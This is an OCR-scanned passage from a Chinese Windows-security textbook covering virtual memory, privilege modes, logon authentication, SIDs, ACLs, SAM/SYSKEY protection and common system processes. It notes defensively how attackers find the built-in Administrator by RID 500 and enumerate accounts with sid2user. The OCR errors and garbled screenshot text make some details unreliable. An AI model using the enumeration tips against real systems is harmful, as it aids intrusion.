(4) 一 个 被 称 为 线程 ID 的 唯一 标识 符 ( 进 程 ID 和 线程 ID 在 内 部 都 叫 客户 ID, 它 们 是 
在 同一 个 名 字 空 间 中 生成 的 ,不 可 能 重要 ) 。 

(5) 有 时 也 有 线程 安全 环境 。 涉 及 Windows 的 模仿 机 制 。 

易 失 的 寄存 器 、 栈 和 局 部 存储 区 合 起 来 被 称 为 线程 的 上 下 文 (context) 。 


有 3. 虚拟 内 存 


虚拟 内 存 提供 了 一 个 内 存 的 逻辑 视图 , 它 并 不 对 应 于 物理 内 存 的 布局 。 在 运行 的 时 候 ， 
内 存 管理 器 借助 于 硬件 的 支持 ,将 虚拟 地 址 映射 成 物理 地 址 。 

每 个 进程 都 有 自己 的 虚拟 地 址 空间 ,而 且 它 会 感觉 到 自己 独占 了 这 个 很 大 的 地 址 空间 。 
在 32 位 x86 系统 中 ,总 的 虚拟 地 址 空间 的 大 小 为 4GB。 因 为 32 位 指针 可 以 表示 
0X00000000 一 0XFFFFFFFF 之 间 的 值 。 但 是 默认 情况 下 , Windows 会 将 2GB 的 地 址 空间 
送 给 进程 ,作为 其 私有 地 址 空间 , 称 为 用 户 模式 空间 ; 而 另 一 半 ( 地 址 空间 中 较 高 的 一 半 , 从 
0X80000000 一 0XFFFFFFFF) 则 作为 它 受 保护 的 内 核 使 用 , 称 为 内 核 模 式 空 间 。 

虚拟 内 存 有 三 个 好 处 。 

(1) 程序 可 以 使 用 一 系列 相 邻 的 虚拟 地 址 来 访问 物理 内 存 中 不 相 邻 的 内 存 块 。 

(2) 程序 可 以 访问 大 于 可 用 物理 内 存 的 内 存 缓冲 区 。 当 物理 内 存 的 供应 量变 小 时 ,内 
存 管 理 器 会 将 物理 内 存 页 (通常 大 小 为 4KB) 保 存 到 磁盘 文件 。 页 面 会 根据 需要 在 物理 内 存 
与 磁盘 之 间 换 入 或 换 出 。 

(3) 不 同 进 程 使 用 的 虚拟 地 址 彼此 隔离 。 一 个 进程 中 的 代码 无 法 访问 正在 由 另 一 进程 
使 用 的 物理 内 存 。 


@— 
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上 4 内 核 模式 和 用 户 模式 


CPU 有 不 止 一 种 特权 级 别 , 可 以 用 来 保护 系统 代码 和 数据 不 被 低级 别 的 代码 修改 。 
Windows 就 使 用 了 CPU 的 两 种 模式 ,而 将 其 称 为 用 户 模 式 和 内 核 模 式 。 用 户 程序 代码 运 
行 在 用 户 模 式 下 ,而 操作 系统 代码 运行 在 内 核 模式 下 。 内 核 模式 的 权限 更 高 , 它 允 许 访问 所 
有 的 系统 内 存 和 执行 所 有 的 CPU 指令 。 而 只 有 操作 系统 的 代码 才能 在 内 核 模式 执行 ,从 而 
能 防止 恶意 的 应 用 程序 破坏 系统 。 

每 个 Windows 进程 都 有 自己 的 私有 地 址 空间 ,但 内 核 模式 的 操作 系统 和 设备 驱动 程序 
共享 同一 个 虚拟 地 址 空间 。 虚 拟 内 存 中 的 每 个 页 面 都 标记 了 处 理 器 在 什么 访问 模式 下 才 可 
以 访问 该 页 面 。 注 意 ,设备 驱动 程序 可 不 一 定 是 微软 编写 的 ,因此 系统 对 恶意 的 驱动 程序 就 
缺少 保护 。 这 就 是 为 什么 Windows 会 更 慎重 地 对 待 驱 动 程序 ,并 引入 了 了 豫 动 程序 签名 。 

应 用 程序 在 发 出 一 个 系统 服务 调用 的 时 候 , 会 从 用 户 模 式 切换 到 内 核 模 式 , 这 时 会 发 生 
什么 ? 线程 会 切换 吗 ? 用 户 地 址 空间 和 内 核 地 址 空间 不 同 ,而 页 目录 、 页 表 又 是 进程 相关 
的 ,怎么 办 ? 

从 用 户 模式 转换 到 内 核 模式 ,可 以 通过 专门 的 处 理 器 指令 来 完成 。 这 条 指令 会 将 CPU 
切换 到 内 核 模 式 。 操 作 系 统 会 捕 提 到 这 条 指令 ,注意 到 有 一 个 系统 服务 的 请 求 到 来 ,然后 执 
行 相应 的 内 部 函数 。 在 将 控制 返回 给 用 户 线 程 以 前 ,处 理 器 的 模式 被 切换 回 用 户 模式 。 

从 用 户 模 式 到 内 核 模 式 的 装 换 本 身 并 不 会 影响 线程 的 调度 一 一 模式 转换 并 不 是 环境 切 
换 。 参 看 图 5-1 所 示 。 





j> 5.1.3 Windows 系统 安全 


Windows 系统 是 C2 级 别 的 操作 系统 (TCSEC 标准 )。 系 统 包 含 6 个 主要 的 安全 元 素 : 
审计 (Audit) ,管理 (Administration) 加密 (Encryption)、 权 限 控制 (Access Control) 、 用 户 认 
证 (User Authentication) 和 安全 策略 (Corporate Security Policy)。 这 些 安全 元 素 的 主要 功 
能 是 用 户 验 证 和 访问 控制 。 

1) 用 户 身 份 验证 

身份 验证 是 系统 安全 一 个 基础 方面 ,将 对 尝试 登录 到 域 或 访问 网 络 资源 的 任何 用 户 进 
行 身 份 确认 。Windows Server 系统 采用 单一 登录 方式 。 单 一 登录 允许 用 户 使 用 一 个 密码 
或 只 能 一 次 登录 到 域 ,然后 向 域 中 的 任何 计算 机 验证 身份 。 

在 这 种 身份 验证 模型 中 ,安全 子 系统 提供 了 两 种 类 型 的 身份 验证 : 交互 式 登 录 ( 根 据 用 
户 的 本 地 计算 机 或 Active Directory 账户 确认 用 户 的 身份 ) 和 网 络 身 份 验证 (根据 此 用 户 试 
图 访问 的 任何 网 络 服务 确认 用 户 的 身份 )。 为 了 提供 这 种 类 型 身份 验证 ,Windows 系统 包括 
3 种 不 同 的 身份 验证 机 制 : KerberosV5、 公 钥 证 书 和 NTLM。 

交互 式 登 录 过 程 中 向 域 账户 或 本 地 计算 机 确认 用 户 的 身份 ,这 一 过 程 根据 用 户 账户 的 
类 型 而 有 所 不 同 。 

(1) 使 用 域 账户 ,用 户 可 以 通过 存储 在 Active Directory 目录 服务 中 的 单一 登录 凭据 ， 
使 用 密码 或 智能 卡 登录 到 网 络 。 如 果 使 用 域 账户 登录 ,被 授权 的 用 户 可 以 访问 该 域 以 及 任 
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何 信任 域 中 的 资源 。 


(2) 使 用 本 地 计算 机 账户 ,用 户 可 以 通过 存储 在 安全 账户 管理 器 (本 地 安全 账户 数据 
库 ,SAM) 中 的 凭据 ,登录 到 本 地 计算 机 。 任 何 工 作 站 或 成 员 服 务 器 均 可 以 存储 本 地 用 户 账 
户 , 但 这 些 账户 只 能 用 于 访问 本 地 计算 机 。 

网 络 身份 验证 向 用 户 尝 试 访问 的 任何 网 络 服 务 确认 身份 证 明 。 为 了 提供 这 种 类 型 的 身 
份 验证 ,安全 系统 支持 多 种 不 同 的 身份 验证 机 制 , 包 括 KerberosV5. 安 全 套 接 字 层 /传输 层 
安全 性 (SSL/TLS) ,以 及 为 了 向 下 兼容 而 提供 的 NTLM。 

网 络 身份 验证 对 于 使 用 域 账 户 的 用 户 来 说 是 不 可 见 的 。 使 用 本 地 计算 机 账户 的 用 户 每 
次 访问 网 络 资源 时 ,必须 提供 凭据 (如 用 户 名 和 密码 ) 。 通 过 使 用 域 账户 ,用 户 就 具有 了 可 用 
于 单一 登录 的 凭据 。 

2) 基于 对 象 的 访问 控制 

通过 用 户 身份 验证 ,系统 允许 管理 员 控 制 对 网 上 资源 或 对 象 的 访问 。 管 理 员 将 安全 描 
述 分 配给 存储 在 Active Directory 中 的 对 象 。 

通过 管理 对 象 的 属性 ,管理 员 可 以 设置 权限 、 分 配 所 有 权 , 以 及 监视 用 户 访问 。 管 理 员 
不 仅 可 以 控制 对 特殊 对 象 的 访问 ,也 可 以 控制 对 该 对 象 特定 属性 的 访问 。 

这 些 安全 构架 的 目标 就 是 实现 系统 的 可 靠 性 。 从 设计 上 考虑 ,就 是 所 有 的 访问 都 必须 
通过 同一 种 方法 认证 ,减少 安全 机 制 被 绕 过 的 机 会 。 

3) Windows Server 的 登录 过 程 

Windows Server 的 登录 过 程 如 图 5-2 所 示 ,其 安全 机 制 从 登录 时 开始 启动 。 
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5-2 Windows Server 的 登录 过 程 


(1) Winlogon 负责 用 户 登 录 ,注销 及 安全 注意 序列 (Secure Attention Sequence,SAS)。 
在 Windows 中 默认 SAS 为 Ctrl 十 Alt 十 Delete 组 合 键 。 使 用 SAS 的 原因 是 保护 用 户 不 受 
那些 能 模拟 登录 进程 的 密码 捕获 程序 的 干扰 。 

(2) Winlogon 调用 GINA ,并 监视 安全 注意 序列 。 在 GINA 中 输入 用 户 名 及 密码 然后 
按 Enter 键 ,将 会 收集 这 些 信息 。 
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(3) GINA 传送 这 些 安全 信息 给 LSA(Local Security Authority, 本 地 安全 授权 ) 来 进行 

(4) LSA 传送 这 些 信息 给 SSPI(Security Support Provider Interface, 安 全 支持 提供 者 接口 ) 。 

(5) SSPI 是 一 个 与 Kerberos 和 NTLM 通信 的 接口 服务 。SSPI 传送 Authentication 
Packages( 包 含 用 户 名 和 密码 ) 给 Kerberos SSP,Kerberos SSP 检查 目的 机 器 是 本 机 还 是 域 
名 。 如 果 是 登录 本 机 , 则 进行 SAM 数据 验证 ; 如 果 是 登录 域 控制 器 ,再 启动 Net Logon 服 
务 , 到 域 控 制 器 去 验证 。 

(6) 用 户 通过 验证 后 ,登录 进程 会 给 用 户 一 个 访问 令 牌 ,允许 用 户 进 入 系统 。 

Winlogon 在 注册 表 \ HKLM\Software\ Microsoft\ WindowsNT\CurrentVersion 查找 
GinaDLL 键 ,如 果 存 在 Winlogon, 将 使 用 这 个 DLL; 如 果 不 存在 该 键 ,Winlogon 将 使 用 默 
认 值 msgina. dll。 

4) 安全 子 系统 

Winlogon 在 系统 启动 时 运行 ,所 完成 的 第 一 件 事 就 是 启动 并 注册 本 地 安全 验证 子 系统 
(Local Security Authority Subsystem,LSASS) 和 服务 控制 管理 器 。 其 中 ,LSASS 接收 来 自 
Winlogon 进程 的 用 户 登 录 赁 证 ,并 验证 这 些 凭证 信息 。LSASS 包含 5 个 关键 组 件 , 主 要 工 
作 过 程 如 下 。 

(1) 安全 标识 符 (Security Identifier)。 安 全 标识 符 是 标识 用 户 组 和 计算 机 账户 的 唯一 
号 码 。 在 第 一 次 创建 该 账户 时 ,将 给 网 络 上 的 每 一 个 账户 发 布 一 个 唯一 的 安全 标识 符 。 
Windows Server 中 的 内 部 进程 将 引用 账户 的 SID, 而 不 是 账户 的 用 户 名 或 组 名 。 安 全 标识 
符 也 被 称 为 安全 ID 或 SID。 

(2) 访问 令 牌 (Access Token)。 用 户 通 过 验证 后 ,登录 进程 会 给 用 户 一 个 访问 令 牌 ,该 
令 牌 相当 于 用 户 访 问 系统 资源 的 票证 , 当 用 户 试图 访问 系统 资源 时 ,将 访问 令 牌 提供 给 
Windows Server, 然 后 Windows Server 检查 用 户 试图 访问 对 象 上 的 访问 控制 列表 。 如 果 人 允 
许 用 户 访问 该 对 象 , Windows Server 将 会 分 配给 用 户 适 当 的 访问 权限 。 

(3) 安全 描述 符 (Security Descriptor) 。Windows Server 中 任何 对 象 的 属性 都 有 安全 
描述 符 部 分 。 安 全 描述 符 是 和 被 保护 对 象 相关 的 安全 信息 的 数据 结构 ,保存 对 象 的 安全 配 
置 , 列 出 了 允许 访问 对 象 的 用 户 和 组 ,以 及 分 配给 这 些 用 户 和 组 的 权限 。 安 全 描述 符 还 指定 
了 需要 为 对 象 审核 的 不 同 访问 事件 。 文件、 打印 机 和 服务 都 是 对 象 的 实例 ,可 以 对 其 属性 进 
行 设置 。 

(4) 访问 控制 列表 (Access Control List)。 访 问 控 制 列 表 有 两 种 : 任意 访问 控制 列表 
(Discretionary ACL,DACL) 和 系统 访问 控制 列表 (System ACL,SACL)。 

任意 访问 控制 列表 包含 了 用 户 和 组 的 列表 ,以 及 相应 的 权限 一 一 允许 或 拒绝 。 每 一 个 
用 户 或 组 在 任意 访问 控制 列表 中 都 有 特殊 权限 。 而 系统 访问 控制 列表 是 为 审核 服务 的 , 包 
含 了 对 象 被 访问 的 时 间 。 

一 个 用 户 进程 在 接触 一 个 对 象 时 ,安全 引用 监视 器 将 访问 令 牌 中 的 SID 与 对 象 访问 控 
制 列表 中 的 SID 相 匹 配 。 可 能 出 现 两 种 情况 : 如 果 没 有 匹配 ,就 拒绝 用 户 访问 , 称 为 隐 式 拒 
绝 (Implicit Deny); 如 果 有 一 个 匹配 ,就 将 与 ACK 中 的 条 目 关 联 的 权限 授予 用 户 , 可 能 是 一 
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个 Allow 权限 ,也 可 能 是 一 个 Deny 权限 。 

(5) 访问 控制 项 (Access Control Entries) 。 访 问 控制 项 包含 了 用 户 或 组 的 SID 以 及 对 
象 的 权限 。 访 问 控制 项 有 两 种 : 允许 访问 和 拒绝 访问 。 拒 绝 访问 的 级 别 高 于 允许 访问 。 

5) 安全 标识 符 

在 Windows 的 安全 子 系统 中 ,一 个 重要 的 组 件 就 是 安全 标识 符 (SID) ,SID 起 什么 作 
用 ? 假设 某 公司 里 有 一 个 用 户 admin, 这 个 用 户 离开 了 公司 ,就 注销 了 该 用 户 , 又 来 了 一 个 
新 员工 ,他 的 用 户 名 、 密 码 与 原来 那个 相同 ,操作 系统 能 把 他 们 区 分 开 吗 ? 两 个 员工 的 权限 
是 一 样 的 吗 ? 

每 当 创建 一 个 用 户 或 一 个 组 的 时 候 , 系统 会 分 配给 该 用 户 或 组 一 个 唯一 的 SID。 
Windows 的 内 部 进程 将 引用 账户 的 SID, 换 句 话说 ,Windows 对 登录 的 用 户 指派 权限 时 , 表 
面 上 是 看 用 户 名 进行 分 配 , 实 现 上 是 根据 SID 进行 分 配 的 。 如 果 创 建 账户 ,再 删除 账户 , 然 
后 使 用 相同 的 用 户 名 创建 男 一 个 账户 , 则 新 账户 将 不 具有 授权 给 前 一 个 账户 的 权力 或 权限 ， 
原因 是 该 账户 具有 不 同 的 SID 号 。 

-个 完整 的 SID 号 包括 用 户 和 组 的 安全 描述 、48 位 长 度 的 ID authority、 修 订 版 本 、 可 
变 的 验证 值 (Visible Sub-Authority Values)。 例 如 ,使 用 user2sid 工具 软件 ,可 以 查看 账户 
的 SID。 用 Windows 的 系统 工具 ,也 能 查看 SID。 具 体操 作 步 又 如 下 。 

(1) 进入 Windows 的 命令 提示 符 窗 口 ,执行 命令 whoami Vuser, 可 以 查看 当前 用 户 的 SID。 

(2) 执行 命令 wmic useraccount get name,sid, 可 以 查看 所 有 用 户 的 SID, 如 图 5-3 所 
示 。 第 一 项 S 表示 该 字 是 SID; 第 二 项 是 SID 的 版 本 号 ; 第 三 项 是 标志 符 的 颁发 机 构 
(CIdentifier Authority) ; 第 四 项 是 一 系列 的 子 颁发 机 构 代 码 。 中 间 的 30 位 数据 ,由 计算 机 
名 、 当 前 时 间 、 当 前 用 户 态 线程 的 CPU 耗费 时 间 和 总 和 这 三 个 参数 决定 ,以 保证 SID 的 唯一 
性 。 最 后 一 个 标志 着 域内 的 账户 和 组 , 称 为 相对 标识 符 (Relative Identifiers, RID) ,RID 为 
500 的 SID 是 系统 内 置 Administrator 账户 ,即使 重 命名 ,其 RID 保持 为 500 不 变 , 许 多 黑客 
也 是 通过 RID 找到 真正 的 系统 内 置 Administrator 账户 。RID 为 501 的 SID 是 Guest 账户 。 
在 域 中 从 1000 开始 的 RID 代表 用 户 账户 。 如 RID 为 1010 是 该 域 创建 的 第 10 个 用 户 。 

Re 
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(3) 打开 注册 表 , 在 HKEY_USERS\ 中 可 看 到 对 应 用 户 的 SID。 

(4) 有 一 些 工 具 可 以 查看 远程 系统 的 SID, 用 sid2user 工具 软件 ,可 以 通过 SID 号 查看 
用 户 名 ,黑客 在 人 侵 时 ,就 可 以 通过 这 样 的 方式 获得 账户 名 称 信息 ,以 及 判断 是 否 为 
Administration 的 账户 。 


PP 5.1.4 账号 管理 器 及 SYSKEY 双重 加 密 账 户 保护 


Li Windows Server 的 安全 账号 管理 器 


用 户 使 用 账户 登录 到 系统 中 ,利用 账户 来 访问 系统 和 网 络 中 的 资源 ,所 以 操作 系统 的 第 
一 道 安全 屏障 就 是 账号 和 口令 。 如 果 用 户 使 用 用 户 凭 据 成 功 通过 了 登录 的 认证 ,之 后 执行 
的 所 有 命令 都 具有 该 用 户 的 权限 。 执 行 代码 所 进行 的 操作 只 受 限于 运行 账户 所 具有 的 权 
限 。 恶 意 黑 客 的 目标 就 是 以 尽 可 能 高 的 权限 运行 代码 。 

Windows 安装 时 创建 两 个 账号 : Administrator 和 Guest。 其 他 账号 在 安装 某 组 件 时 自 
动产 生 或 可 新 建 。 用 户 账号 的 安全 管理 使 用 了 安全 账号 管理 (Security Account Manager， 
SAM) 机 制 ,SAM 是 Windows 系统 账户 管理 的 核心 ,负责 SAM 数据 库 的 控制 和 维护 ,SAM 
是 由 lsass. exe 进程 加 载 的 。SAM 数据 库 保存 在 %systemroot%system32\config\ 目 录 下 的 
SAM 文件 中 ,在 这 个 目录 下 还 包括 一 个 Security 文件 ,是 安全 数据 库 的 内 容 , 两 者 的 关系 
密切 。 

SAM 用 来 存储 账户 的 信息 ,用户 的 登录 名 和 口令 经 过 Hash 加 密 变换 后 ,以 Hash 列表 
的 形式 存放 在 SAM 文件 中 。 在 正常 设置 下 ,SAM 文件 对 普通 用 户 是 锁定 的 ,如 试图 做 删除 
或 移 除 .复制 操作 时 ,会 出 错 的 。 该 文件 仅 对 System 是 可 读 写 的 。 

SAM 文件 中 用 户 的 登录 名 和 口令 要 经 过 Hash 加 密 。Windows 中 SAM 的 Hash 加 密 
包括 两 种 方式 : LM(LAN Manager) 和 NTLM 的 口令 散 列 。LM 口令 散 列 是 针对 Windows 
9x 的 系统 ,Windows 2000 及 Windows XP 以 上 主要 使 用 NTLM 的 方式 。Windows Server 
2008 再 次 保存 LM 口令 散 列 。 

LM 使 用 的 加 密 机 制 比较 脆弱 ,脆弱 性 主要 是 由 于 : 长 的 口令 被 截 成 14 个 字符 , 短 的 口 
令 被 填补 空格 变 成 14 个 字符 ,口令 中 所 有 的 字符 被 转换 成 大 写 ,口令 被 分 割 成 两 个 7 字符 
的 片段 ,这 就 意味 着 口令 破解 程序 只 要 破解 两 个 7 字符 长 度 的 口令 ,而 且 不 用 测试 小 写 。 

熟悉 SAM 结构 可 以 帮助 安全 维护 人 员 做 好 安全 检测 (当然 也 可 能 让 不 良 企 图 者 利用 )， 
SAM 数据 库 位 于 注册 表 HKLM\SAM\SAM 下 ,受到 ACL 保护 ,可 以 打开 注册 表 编 辑 器 ， 
并 设置 适当 权限 查看 SAM 中 的 内 容 。 








有 2. SYSKEY 双重 加 密 账户 保护 

Windows 设计 SYSKEY 机 制 保护 SAM 文件 .SYSKEY 能 对 SAM 文件 进行 二 次 加 
密 。 工 作 过 程 为 当 SYSKEY 被 激活 后 ,SAM 中 的 口令 信息 在 存 人 注册 表 之 前 ,需要 再 次 进 
行 一 次 加 密 处 理 。 可 以 说 SYSKEY 使 用 了 一 个 密 钥 ,这 个 密 钥 激活 SYSKEY, 由 用 户 自己 
选择 保存 位 置 。 密 钥 可 以 保存 在 软盘 ,或 在 启动 时 由 用 户 生 成 (通过 用 户 输入 的 口令 生成 )， 
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或 者 直接 保存 在 注册 表 中 (默认 模式 ) ,可 以 在 这 三 种 模式 下 随意 转换 。 

SYSKEY 双重 加 密 账 户 ,具体 操作 步 又 如 下 。 

(1) 在 计算 机 中 运行 SYSKEY ,就 可 以 启动 加 密 的 窗口 ,如 图 5-4 所 示 。 若 直接 单 击 
“确定 ”按钮 并 不 会 有 什么 提示 ,其 实 已 经 完成 了 对 SAM 文件 的 二 次 加 密 工 作 。 

此 时 并 没有 设置 双重 启动 密码 ,在 默认 情况 下 选择 “系统 产生 的 密码 ”选项 ,并 且 这 个 密 
码 保存 的 选项 是 “在 本 机 上 保存 启动 密码 ”, 也 就 是 说 密码 会 直接 保存 在 注册 表 中 。 

(2) 单 击 “ 更 新 "按钮 进入 密码 设置 窗口 ,如 图 5-5 所 示 。 第 一 个 选项 设置 了 自己 的 双重 
启动 密码 ,第 二 个 选项 可 以 设置 密码 的 保存 方式 。 
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图 5-4 启动 SYSKEY 图 5-5 SYSKEY 密码 设置 
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选择 “密码 启动 ” 单 选 按钮 后 ,启动 系统 时 ,系统 首先 会 提示 输入 设置 的 启动 密码 。 只 有 
启动 密码 正确 后 , 才 会 出 现 用 户 和 密码 的 输入 界面 。 

(3) 取消 双重 加 密 的 设置 。 利 用 SYSKEY 可 以 很 好 地 加 密 账号 密码 数据 文件 ,同时 所 
设置 的 启动 双重 密码 也 可 以 很 好 地 保护 系统 安全 。 这 个 加 密 功 能 一 旦 启动 就 无 法 关闭 , 除 
非 在 启动 SYSKEY 前 备份 注册 表 , 然 后 用 备份 的 注册 表 来 恢复 当前 的 注册 表 。 

口令 (密码 ) 应 该 说 是 用 户 最 重要 的 一 道 防护 门 ,如果 口令 被 破解 了 ,那么 用 户 的 信息 将 
很 容易 被 窃取 。 随 着 网 络 黑客 攻击 技术 的 增强 和 提高 ,许多 口令 都 可 能 被 攻击 和 破译 ,这 就 
要 求 用户 提 高 对 口令 安全 的 认识 。 


5.2 常用 的 系统 进程 和 服务 


PP 5.2.1 常用 的 系统 进程 


进程 (Process) 是 操作 系统 中 最 基本 、 重 要 的 概念 。 是 多 道 程序 系统 出 现 后 ,为 了 刻画 
系统 内 部 出 现 的 动态 情况 ,描述 系统 内 部 各 道 程序 的 活动 规律 引进 的 一 个 概念 ,所 有 多 道 程 
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序 设计 操作 系统 都 建立 在 进程 的 基础 上 。 

进程 是 计算 机 中 的 程序 关于 某 数据 集合 上 的 一 次 运行 活动 ,是 系统 进行 资源 分 配 和 调 
度 的 基本 单位 ,是 操作 系统 结构 的 基础 。 在 早期 面向 进程 设计 的 计算 机 结构 中 ,进程 是 程序 
的 基本 执行 实体 ; 在 当代 面向 线程 设计 的 计算 机 结构 中 ,进程 是 线程 的 容器 。 程 序 是 指令 、 
数据 及 其 组 织 形式 的 描述 ,进程 是 程序 的 实体 。 

(1) 动态 性 : 进程 的 实质 是 程序 在 多 道 程 序 系统 中 的 一 次 执行 过 程 ,进程 是 动态 产生 、 
动态 消亡 的 。 

(2) 并 发 性 : 任何 进程 都 可 以 同 其 他 进程 一 起 并 发 执行 。 

(3) 独立 性 : 进程 是 一 个 能 独立 运行 的 基本 单位 ,同时 也 是 系统 分 配 资源 和 调度 的 独立 
单位 。 

(4) 异步 性 : 由 于 进程 间 的 相互 制约 ,使 进程 具有 执行 的 间断 性 , 即 进程 按 各 自 独 立 的 、 
不 可 预知 的 速度 向 前 推进 。 

(5) 结构 特征 : 进程 由 程序 数据 和 进程 控制 块 三 部 分 组 成 。 

(6) 多 个 不 同 的 进程 可 以 包含 相同 的 程序 : 一 个 程序 在 不 同 的 数据 集 里 就 构成 不 同 的 
进程 ,能 得 到 不 同 的 结果 ,但 是 执行 过 程 中 ,程序 不 能 发 生 改 变 。 


Li: Windows Server 常用 的 系统 进程 


一 般 通 过 Windows 系统 的 任务 管理 器 来 查看 进程 ,能 够 提供 很 多 信息 ,如 现在 系统 中 
运行 的 进程 .PID、 内 存 情况 等 ,如 图 5-6 所 示 。 可 在 任务 管理 器 的 “查看 ”菜单 中 选择 “选择 
列 ” 命 令 , 选 择 进程 页 上 的 描述 列 。 



















































































二 Windows 任务 管理 器 

文件 (选项 (D) | 喜 看 (V) | 孝 鳃 (H) 

| 应 用 程序 | 进程 
映像 名 称 
System Idle Process 
taskmer, exe Administrator 
wm exe Administrator 
QQ. exe #32 Administrator 
360se. exe *#32 Administrator 
sppsve. exe NWETWORK SERY 
OSPPSYC. EXE NETWORK SER' 
mware-tray. exe #32 Adninistrator 
360tray. exe #32 Adninistrator 
protectx. exe #32 Admninistrator 
conhost, exe Administrator 
slivssv. exe 432 Aaainistrataa 
SynLenovolelper. exe Administrator 
2 A 

回 显 示 所 有 用 户 的 进程 5) 
































es: 80 CPU 使 用 率 : 4% 





5-6 任务 管理 器 中 进程 列 设置 


这 些 进 程 可 以 分 为 系统 进程 和 用 户 进程 。 凡 是 用 于 完成 操作 系统 各 种 功能 的 进程 就 是 
系统 进程 ,是 处 于 运行 状态 下 的 操作 系统 本 身 ; 用 户 进 程 就 是 所 有 由 用 户 启动 的 进程 。 进 
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程 是 操作 系统 进行 资源 分 配 的 单位 。 系 统 进程 又 分 为 系统 的 关键 进程 和 一 般 进 程 两 类 。 

1) 系统 的 关键 进程 

在 Windows Server 中 ,系统 的 关键 进程 是 系统 运行 的 基本 条 件 。 有 了 这 些 进程 ,系统 
就 能 正常 运行 。 系 统 的 关键 进程 如 下 。 

(1) System Idle Process。 该 进程 也 称 为 “系统 空闲 进程 ”。 这 个 进程 作为 单线 程 运行 
在 每 个 处 理 器 上 ,是 在 CPU 空闲 的 时 候 发 出 一 个 Idle 命令 ,使 CPU 挂 起 (暂时 停止 工作 )， 
可 有 效 地 降低 CPU 内 核 的 温度 ,在 操作 系统 服务 里 面 , 都 没有 禁止 该 进程 的 选项 。 默 认 是 
占用 除了 当前 应 用 程序 所 分 配 的 CPU 百分比 之 处 的 所 有 占有 率 。 一 旦 应 用 程序 发 出 请 求 ， 
处 理 器 会 立刻 响应 。 在 这 个 进程 里 出 现 的 CPU 占用 数值 并 不 是 真正 的 占用 ,而 是 体现 
CPU 的 空闲 率 。 

(2) System。System 是 Windows 系统 进程 (该 进程 的 PID 号 最 小 ) ,这 个 进程 是 不 能 
被 关 掉 的 , 它 控制 着 系统 Kernel Mode 的 操作 。 如 果 发 现 System 占用 了 100% 的 CPU, 表 
示 系 统 的 Kernel Mode 一 直 在 运行 系统 进程 ,负责 Windows 页 面 内 存 管理 进程 。 没 有 
System 系统 无 法 启动 。 

(3) smss. exe。Session Manager 是 一 个 会 话 管理 子 系统 ,负责 启动 用 户 会 话 。 这 个 进 
程 用 来 初始 化 系统 变量 ,并且 对 许多 活动 的 (包括 已 经 正在 运行 的 Winlogon ,csrss. exe) 进 
程 和 设 定 的 系统 变量 做 出 反应 。 

(4) csrss. exe。csrss. exe 是 Windows 操作 系统 的 客户 端 /服务 器 端 运 行 时 的 子 系统 。 
该 进程 管理 Windows 图 形 的 相关 任务 。csrss 用 于 维持 Windows 的 控制 ,创建 或 删除 线程 
和 一 些 16 位 的 虚拟 MS-DOS 环境 。 

(5) Winlogon. exe。 该 进程 是 管理 用 户 登 录 的 ,而 且 Winlogon 在 用 户 按 Ctrl 十 Alt 十 
Delete 组 合 键 时 被 激活 ,显示 安全 对 话 框 。 

(6) services. exe。services. exe 是 Windows 操作 系统 的 一 部 分 ,用 于 管理 启动 和 停止 
服务 。 该 进程 也 会 处 理 在 计算 机 启动 和 关机 时 运行 的 服务 。 这 个 程序 对 系统 的 正常 运行 是 
非常 重要 的 。 

(7) lsass. exe。 这 是 一 个 本 地 的 安全 授权 服务 ,并 且 会 为 使 用 Winlogon 服务 的 授权 用 
户 生成 的 一 个 进程 。 这 个 进程 是 通过 使 用 授权 的 包 , 如 默认 msgina. dll 来 执行 。 如 果 授 权 
是 成 功 的 ,lsass 就 会 产生 用 户 的 进入 令 牌 , 令 牌 使 用 启动 初始 的 shell。 其 他 由 用 户 初始 化 
的 进程 会 继承 这 个 令 牌 。 

(8) svchost. exe。 在 启动 的 时 候 ,svchost. exe 检查 注册 表 中 的 位 置 来 构建 需要 加 载 的 
服务 列表 。 多 个 svchost. exe 可 以 在 同一 时 间 运 行 ; 每 个 svchost. exe 的 会 话 期 间 都 包含 一 
组 服务 ,单独 的 服务 必须 依靠 Svchost. exe 获知 怎样 启 动 和 在 哪里 启动 。 svchost. exe 也 有 
可 能 是 w32. welchia. worm 病毒 , 它 利用 windowslsass 漏洞 ,制造 缓冲 区 溢出 ,导致 计算 机 
关机 。 正 常 的 svchost. exe 文件 存在 于 %systemroot%\system32 目录 下 ,如 果 发 现 该 文件 
出 现在 其 他 目录 下 就 要 小 心 了 。 

(9) explorer. exe。 该 进程 是 桌面 进程 。 

(10) spoolsv. exe。 管 理 缓冲 池 中 的 打印 和 传真 作业 。 


meer 








2) 系统 的 一 般 进 程 

系统 的 一 般 进 程 不 是 系统 必要 的 ,可 以 根据 需要 通过 服务 管理 器 来 增加 或 减少 ,简要 进 
程 ,如 表 5-2 所 示 。 一 般 来 讲 , 打 开 进 程 所 在 的 文件 位 置 ,如 果 文 件 在 % systemroot%\ 
system32\ 或 %systemroot%\ 中 的 ,可 以 认为 是 系统 进程 。 


表 5-2 系统 的 一 般 进程 




















进程 名 称 简要 描述 
internat. exe 微软 Windows 多 语言 输入 程序 , 即 托盘 区 的 拼音 图 标 
mstask. exe 允许 程序 在 指定 时 间 运 行 
TegSVCc. exe 允许 远程 计算 机 访问 本 地 注册 表 操 作 , 进 程 名 称 为 RemoteRegistry Service 
inetinfo. exe 主要 用 于 支持 微软 Windows IIS 网 络 服 务 的 除 错 
rundll32. exe Windows Rundll32 为 了 需要 调用 DLL 的 程序 


12. 进程 管理 操作 


如 果 一 个 恶意 的 攻击 者 把 木马 命名 为 dllhost. exe、svchost. exe 等 ,就 很 难 判断 出 哪个 
是 正常 进程 。 这 就 要 求 用 户 掌握 进程 的 详细 信息 ,如 进程 的 具体 路 径 、 进 程 的 模块 信息 、 端 
口 信息 等 。 在 Windows 系统 中 也 用 系统 工具 查看 正在 运行 的 任务 ,方法 是 依次 选择 “ 开 
始 ” 一 “程序 ”一 “附件” 一 “系统 工具 ”>“ 系 统 信 息 ”>“ 软 件 环 境 ”->“ 正 在 运行 任务 ”命令 。 

也 可 以 使 用 IceSword 等 工具 软件 查看 详细 信息 。 冰 刃 (IceSword) 是 客户 端 使 用 最 多 
的 一 个 工具 。 适 用 于 Windows 32 位 操作 系统 下 ,用 于 查 探 系统 中 的 幕后 黑手 (木马 后 门 ) 并 
做 出 处 理 , 当 然 使 用 它 需 要 用 户 有 一 些 操作 系统 的 知识 。 由 于 冰 刃 不 支持 在 x64 系统 下 运 
